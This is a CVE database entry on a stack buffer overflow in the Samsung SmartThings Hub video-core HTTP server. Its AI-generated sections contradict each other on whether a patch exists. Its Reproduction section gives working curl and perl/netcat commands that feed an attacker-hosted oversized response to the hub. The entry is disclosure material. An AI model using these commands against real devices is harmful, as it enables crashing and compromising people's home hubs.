CVE-2018-3867
Description
An exploitable stack-based buffer overflow vulnerability exists in the samsungWifiScan callback notification of video-core's HTTP server of Samsung SmartThings Hub STH-ETH-250 devices with firmware version 0.20.17. The video-core process incorrectly handles the answer received from a smart camera, leading to a buffer overflow on the stack. An attacker can send a series of HTTP requests to trigger this vulnerability.
AI Insight
LLM-synthesized narrative grounded in this CVE's description and references.
Stack-based buffer overflow in Samsung SmartThings Hub video-core HTTP server allows remote attackers with low privileges to execute arbitrary code.
Vulnerability
Stack-based buffer overflow in the samsungWifiScan callback notification handler of the video-core HTTP server in Samsung SmartThings Hub STH-ETH-250 with firmware version 0.20.17. The video-core process fails to properly validate the size of the answer received from a smart camera, leading to a buffer overflow on the stack. [1]
Exploitation
An attacker can send a series of crafted HTTP requests to the video-core HTTP server, causing the hub to process a malicious response that overflows a stack buffer. The attacker does not require physical access but must be able to communicate with the hub over the network. According to the CVSS vector, low privileges are required (PR:L), suggesting the attacker may need some level of authentication or network access. [1]
Impact
Successful exploitation allows an attacker to execute arbitrary code on the hub with the privileges of the video-core process. Given the CVSS scope change (S:C), the attacker can compromise resources beyond the vulnerable component, potentially gaining full control of the hub. This can lead to disclosure of sensitive information, modification of device settings, and denial of service. [1]
Mitigation
As of the advisory publication date (August 2018), no patch was available. Users should monitor Samsung's security advisories for firmware updates. The affected firmware version is 0.20.17; upgrading to a later version may address the vulnerability. No workarounds are documented. [1]
AI Insight generated on May 26, 2026. Synthesized from this CVE's description and the cited reference URLs; citations are validated against the source bundle.
Affected products
2- Range: =0.20.17
- Samsung/SmartThings Hub STH-ETH-250v5Range: Firmware version 0.20.17
Patches
0No patches discovered yet.
Vulnerability mechanics
Root cause
"Unbounded sprintf copy of the smart camera's HTTP response into a fixed-size stack buffer in sub_45AA8."
Attack vector
An attacker sends a POST request to `http://127.0.0.1:3000/samsungWifiScan` with a `cameraIp` pointing to an attacker-controlled machine [ref_id=1]. The video-core process uses libcurl to send an HTTP GET to that camera IP; the attacker replies with a crafted HTTP response containing a large payload (e.g., 0x700 bytes of 'A') [ref_id=1]. This response is then copied via `sprintf` into a fixed stack buffer without size checking, causing a stack-based buffer overflow [CWE-120] [ref_id=1]. The attacker can trigger this from a malicious SmartApp running on the hub, by impersonating the remote SmartThings servers, or potentially via the mobile application with a valid OAuth token [ref_id=1].
Affected code
The vulnerability resides in the `sub_45AA8` function of the video-core process, which handles the callback notification for the `/samsungWifiScan` endpoint. The function allocates a stack buffer at `sprintf_dest` (offset `-0x6E0`) and passes the unconstrained smart camera HTTP response directly as a format argument to `sprintf` at [7] [ref_id=1]. The camera response is obtained via `curl_easy_perform` at [4] and stored in `curl_data_buffer`, then passed as the second argument (`R1`) to `sub_45AA8` at [5] [ref_id=1].
What the fix does
The advisory states that the vendor patched the vulnerability on 2018-07-17, but no patch diff is included in the bundle [ref_id=1]. The root cause is the use of `sprintf` with an unconstrained camera response into a stack buffer of fixed size (0x70C bytes for the `s` buffer, with `sprintf_dest` at offset `-0x6E0`) [ref_id=1]. A proper fix would replace the unbounded `sprintf` with a bounded copy function (e.g., `snprintf`) or validate the length of the camera response before copying it to the stack buffer [CWE-120].
Preconditions
- networkAttacker must be able to send HTTP requests to the video-core process on localhost port 3000, either via a malicious SmartApp, by impersonating the remote SmartThings servers, or through the mobile application with a valid OAuth token
- networkAttacker must control a machine reachable from the hub that can respond to the HTTP GET request sent by video-core to the specified cameraIp
- configThe video-core process must be running (default on Samsung SmartThings Hub STH-ETH-250 with firmware 0.20.17)
Reproduction
From inside the hub, send: `curl -X POST 'http://127.0.0.1:3000/samsungWifiScan' -d "{\"cameraIp\":\"${sAttackerIP}:${sAttackerPort}\"}"`. On the attacker machine, run: `perl -e 'print "A"x0x700' | nc -l -p ${sAttackerPort}`. Once the netcat connection is closed, video-core should crash [ref_id=1].
Generated on May 26, 2026. Inputs: CWE entries + fix-commit diffs from this CVE's patches. Citations validated against bundle.
References
1- www.talosintelligence.com/vulnerability_reports/TALOS-2018-0549mitrex_refsource_MISC
News mentions
0No linked articles in our index yet.